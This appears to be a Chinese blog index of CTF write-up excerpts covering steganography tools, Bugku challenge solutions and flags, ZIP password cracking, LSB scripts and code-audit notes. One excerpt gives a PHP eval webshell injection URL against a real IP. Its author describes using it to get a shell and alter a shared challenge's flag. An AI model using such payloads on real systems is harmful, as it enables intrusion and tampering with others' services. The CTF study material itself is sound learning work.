道格ctf平台WriteUp

道格ctf平台WriteUp

MISC部分0x01:听音乐听音乐下载下来解压后得到如下一个mp3文件,一个jpg文件: mp3隐写我们常用的工具是mp3stegomp3stego的用法如下:解密1decode.exe -X -P pass svega_stego.mp3 加密1encode.exe -E hidden_text.txt -P pass svega.wav svega_stego.mp3...

bugku题目搅屎

bugku题目搅屎

题目如下:起因是得到了某题的flag后发现提交不正确,所以怀疑有人把flag给改了,然后自己试了下,成功getshell 如下链接可前台getshell1http://120.24.86.145:8003/?hello=);eval($_POST[a]);// 然后还可以任意改flag 过狗一句话真的是送了一句话直接连上去:http://120.24.86.145:8...

bugkuWEB

bugkuWEB

0x01:web2直接等它的js特效完了以后查看页面源代码1KEY{Web-2-bugKssNNikls9100} 0x02:文件上传测试请上传php文件,那么我们先传一个php文件试试提示非图片文件那么我们先将php文件后缀改为jpg,然后抓包改为.php得到flag1Flag:42e97d465f962c53df9549377b513c7e 0x0...

记某群入群题2

记某群入群题2

下载下来首先是个压缩包先试一试暴力破解密码:使用工具ziperello,搜索模式选择暴力破解,然后选择1到6位数字暴力破解 成功得到压缩包的密码3435 解压得到如下文件:给第一个文件加个后缀.txt打开得到压缩包密码20170913 又得到两个zip压缩包文件: 发现第一个压缩包打开错误,把第一个放到十六进制编辑器中查看,发现文件头有问题,然后自己把他改为50 4B 0...

bugku杂项

bugku杂项

0x01:这是一张单纯的图片先丢binwalk里面看一下,没有发现什么,那么直接改后缀为txt,然后打开发现:一段unicode,那么直接在线unicode转ascii,得到flag1key{you are right} 0x02:隐写解压得到一张png图片,先用pngcheck看一下: 发现图片的crc有问题,而图片的crc是由图片的IHDR数据块计...

socket编程学习

socket编程学习

0x01:用python实现一个C/S通信服务端代码12345678910111213141516171819#encoding:utf-8import sockets = socket.socket()host = ""port = 9999s.bind((host, port)) #绑定地址到套接字s.listen(5) # 开始tcp监听,并设置...

杂项中zip的总结

杂项中zip的总结

0x00:关于zip的一些基础知识文件头:50 4B 03 0450 4B 16进制ascii转字符后是zip格式文件创始人的名称的缩写P K0x50 => P0x4B => K zip压缩后压缩包内每个文件都有一个CRC值,CRC值只和文件内容有关 0x01:用ZipCenOp破解伪加密先切换到ZipCenOp.jar的目录,然后将zip伪加密的压缩包拷到同...

用py,js,php实现简单的区块链

用py,js,php实现简单的区块链

前言:最近区块链技术很火,所以我也就来学习一下,在了解了一些区块链的基本概念后,就学习了一波网上简单的实现区块链的代码。对区块链的一些基础知识,可以阮老师的这篇文章:http://www.ruanyifeng.com/blog/2017/12/blockchain-tutorial.html php实现:参考地址:http://sex.linglingtang.com/f...

记某群入群题LSB隐写

记某群入群题LSB隐写

先下载附件解压得到一张图片CuteCat.png 然后用StegSolve打开,发现Red plane 0和Green plane 0以及 Blue plane 0很相似,那么很可能是LSB 然后我们用下面这个脚本跑一下:1234567891011121314151617181920from PIL import Imageim = Image.open("Cu...

i春秋代码审计课程学习笔记

i春秋代码审计课程学习笔记

代码审计的思路都是先看sys目录还有user目录等 0x01:命令注入直接在所有文件中搜索命令函数,比如system,exec等,然后看这些命令执行函数的参数来源于哪里,参数是否有过滤,过滤能否bypass 0x02:安装问题的审计 无验证功能,任意重装覆盖 $_GET[‘step’]跳过限制步骤 变量覆盖导致重装 判断lock后跳转无exit 解析install.php...

×
  • {title}